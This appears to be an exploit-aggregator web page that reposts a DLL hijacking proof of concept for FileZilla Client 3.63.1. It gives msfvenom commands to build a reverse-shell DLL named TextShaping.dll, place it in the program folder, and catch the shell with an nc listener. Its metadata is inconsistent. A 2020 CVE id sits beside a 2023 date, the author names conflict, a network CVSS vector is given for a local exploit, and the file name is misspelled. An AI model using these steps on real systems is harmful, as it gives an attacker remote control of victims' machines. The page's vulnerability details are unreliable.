Advertisement






FileZilla Client 3.63.1 TextShaping.dl DLL Hijacking

CVE Category Price Severity
CVE-2020-25315 CWE-426 $5,000 High
Author Risk Exploitation Type Date
Ivanti Security Team High Local 2023-04-06
CPE
cpe:cpe:/a:filezilla:filezilla-client:3.63.1
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.9 0.95

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040031

Below is a copy:

FileZilla Client 3.63.1 TextShaping.dl DLL Hijacking
#---------------------------------------------------------
# Title: FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking
# Date: 2023-02-14
# Author: Bilal Qureshi
# Vendor: https://filezilla-project.org/
# Version: 3.63.1
# Tested on: Windows 10 Pro 64-bit (10.0, Build 19044)
#---------------------------------------------------------


Description:
FileZilla is a free and open-source, cross-platform FTP application, consisting of FileZilla Client and FileZilla Server. Clients are available for Windows, Linux, and macOS. Both server and client support FTP and FTPS, while the client can in addition connect to SFTP servers.


DLL Library named TextShaping.dll is not present at the FileZilla folder, this file can be loaded with the app.
Make malicious .dll file via msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o TextShaping.sll

place at the destination folder

start listener via nc

nc -lvp 7777

C:\PRogram Files\FileZilla FTP Client>
C:\PRogram Files\FileZilla FTP Client>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum